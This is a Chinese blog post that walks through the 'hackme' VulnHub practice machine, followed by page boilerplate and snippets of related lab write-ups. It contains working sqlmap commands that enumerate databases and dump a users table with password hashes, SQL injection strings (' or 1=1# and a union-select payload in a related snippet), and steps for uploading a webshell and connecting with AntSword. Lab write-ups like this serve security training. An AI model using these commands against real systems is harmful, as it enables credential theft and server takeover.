hackme靶机通关攻略

于 2024-09-03 18:55:09 发布
阅读量340 收藏 3
点赞数 12
文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kknifek/article/details/141867345
版权

 1.先进行端口扫面,扫面和我们同一网段的靶机

2.找出靶机的ip

 

3.看看他有些什么目录

4.访问这些文件后我们先创建一个账户并登录

 

5.登录后输入sql语句' or 1=1#获得下图数据

6.再输入1进行抓包

 

7.用sqlmap验证是否存在sql注入

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --  cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  --level=3

 

8.查所有数据库

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  --dbs

 

9.查当前数据库

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  --current-db

 

10.查数据库中的表

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  -D webapphacking --tables

 

10.查users表中的列

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  -D webapphacking -T users --columns

 

11.查出所有数据

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  -D webapphacking -T users -C name,user,address,id,pasword --dump

 

12.使用MD5解密方法对密码进行解密

13.登录解密后的超级管理员用户(superadmin)

 

14.登录后上传一句话木马

 

 

15成功上传

 

16.复制文件地址用蚁剑成功连接

 

 

 

 

桶将军T
关注
  • 12
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1069
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 4002
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
靶机通关 | hackme.ova靶机通关秘籍~
鱼溯的博客
10-19 217
靶场通关 | hackme.ova靶机通关秘籍~
靶机通关| hackme.ova通关攻略
a96482的博客
07-29 371
GitHub - foryujian/yjdirscan: 御剑目录扫描专业版,简单实用的命令行网站目录扫描工具,支持爬虫、fuzz、自定义字典、字典变量、UA修改、假404自动过滤、扫描控速等功能。发现共有5个网址,通过一一访问,我们并没有发现注入点,但该站点有注册、登录功能,我们可以去注册、登录进去看是否有注入点。该网站有登录,注册界面,我们可以尝试二次注入,但是由于没有修改账户的页面,也宣告失败。我们注册后会发现,会在页面上显示用户名,可以尝试XSS注入,但是失败了。最后经判断为sql注入类型。
hackme-1通关
qq_45747465的博客
06-12 68
打靶 HACKME-1
vulhub靶场学习日记hackme2
m0_55763479的博客
07-12 326
vulhub靶场学习日记hackme2
hackme靶场通关
weixin_56594114的博客
08-02 70
模式子网地址,靶机需要也设置成。显示结果,说明闭合方式是'去扫描全网段查看靶机的。
hackme1新手教学
w2411313的博客
10-13 8983
15.输入-1' union select group_concat(user),group_concat(pasword),3 from users#,查看user和password的具体信息,发现用户名其中一个是superadmin,最有可能为管理员账户,得到用户名和密码,但是密码被md5加密。>,点击选择文件进行上传,然后点击upload image。12.输入-1' union select database(),2,3# ,查看数据库具体信息,得到数据库名称为webapphacking。
XSS Challenges通关记1-10
qq_35258210的博客
02-04 367
靶机在线链接:http://xss-quiz.int21h.jp/ 目录 Stage #1 Stage #2 Stage #3 Stage #4 Stage #5 Stage #6 Stage #7 Stage #8 Stage #10 Stage #1 首先审查元素 发现这里是value=""> 我们闭合下 payload:"><script>alert(document.domain)</script> 成功弹出 Stage #
Hackme靶机渗透
m0_50584370的博客
06-01 245
hackme靶机渗透
DVWA靶机通关攻略第三关——CSRF攻击
小飞飞的博客
03-09 1021
DVWA靶机通关攻略请求伪造详细教学
DVWA靶机通关攻略第四关——文件包含
小飞飞的博客
03-11 787
DVWA靶机的文件包含详细教学
DVWA靶机通关攻略第五关——文件上传
小飞飞的博客
03-11 956
DVWA靶机文件上传详细教学
HACKME:1靶机
JKding123的博客
10-22 972
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
并发服务器
m0_71459026的博客
08-27 381
1.阻塞IO:fgets、scanf、read、recv、getchar。实现步骤:获取原文件描述符的属性->增加非阻塞属性->设置新属性。1.单循环服务器:同一时刻,只能处理一个客户端的任务;2.并发服务器:同一时刻,可以处理多个客户端的任务;:文件描述符,指向要进行操作的打开文件的描述符。(1)异步通知的IO方式,节省CPU;(1)实现多个IO同步的效果。,则它是要设置的值;(1)多个IO复用一个进程;(1)使用轮询的方法实现。(2)只能监测少量IO;(2)cpu占有率低。(2)cpu占有率高。
监控Nginx负载均衡后端服务器状态的策略与实践
2401_85439108的博客
08-29 764
在Nginx负载均衡的部署中,监控后端服务器的状态对于确保高可用性和服务连续性至关重要。通过检测后端服务器的状态,可以及时发现问题并采取措施,如故障转移或服务重启。本文将详细介绍如何检测Nginx负载均衡后端服务器的状态,包括监控方法、工具使用、配置实现以及自动化告警。
Nginx中设置服务器备用(backup)状态的策略与实践
2401_85760095的博客
08-29 533
在Nginx负载均衡配置中,设置服务器的备用(backup)状态是一种高可用性策略,用于确保在主服务器不可用时,备用服务器能够接管服务。本文将详细介绍如何在Nginx中设置服务器的备用状态,包括备用服务器的作用、配置方法、故障转移机制以及相关的负载均衡策略。
用ASP.NET Core WebApi把ofd文件上传到服务器上处理为pdf文件后返回一个服务器地址
最新发布
战族狼魂的博客
08-30 892
在生成的项目中,我们将创建一个 API 控制器来处理文件上传。文件将上传到服务器,在服务器上处理,并返回文件的存储地址。确保项目配置正确以支持文件上传。对于 ASP.NET Core 6 或 7(最小化主机模型),我们需要在。中配置静态文件支持和请求限制。文件夹中,添加一个新类。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值